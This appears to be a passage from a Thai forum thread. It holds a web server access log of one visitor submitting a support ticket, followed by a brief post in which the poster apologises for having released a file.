58.9.20.41 - - [25/Jan/2012:01:24:40 +0700] "GET /submitticket.php HTTP/1.1" 200 2419 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.9.20.41 - - [25/Jan/2012:01:24:41 +0700] "GET /images/emails.gif HTTP/1.1" 200 1524 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.9.20.41 - - [25/Jan/2012:01:24:44 +0700] "GET /submitticket.php?step=2&deptid=2 HTTP/1.1" 200 3230 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.9.20.41 - - [25/Jan/2012:01:24:44 +0700] "GET /includes/verifyimage.php HTTP/1.1" 200 2398 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.9.20.41 - - [25/Jan/2012:01:24:44 +0700] "GET /images/add.gif HTTP/1.1" 200 1092 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.9.20.41 - - [25/Jan/2012:01:24:53 +0700] "POST /submitticket.php HTTP/1.1" 200 734 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.9.20.41 - - [25/Jan/2012:01:24:55 +0700] "POST /submitticket.php?step=3 HTTP/1.1" 302 766 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.9.20.41 - - [25/Jan/2012:01:24:55 +0700] "GET /submitticket.php?step=4 HTTP/1.1" 200 2318 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
58.9.20.41 - - [25/Jan/2012:01:24:57 +0700] "GET /viewticket.php?tid=300655&c=xHrbURKz HTTP/1.1" 200 4494 "https://mydomain.com/submitticket.php?step=4" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
11163
January 27, 2012, 8:35pm
18
ผมไม่น่าเอาไฟล์มาปล่อยเลย เอาไฟล์มาแล้วเงียบ ก็คิดว่า มีเรื่องแน่ๆ ขอโทษด้วยครับ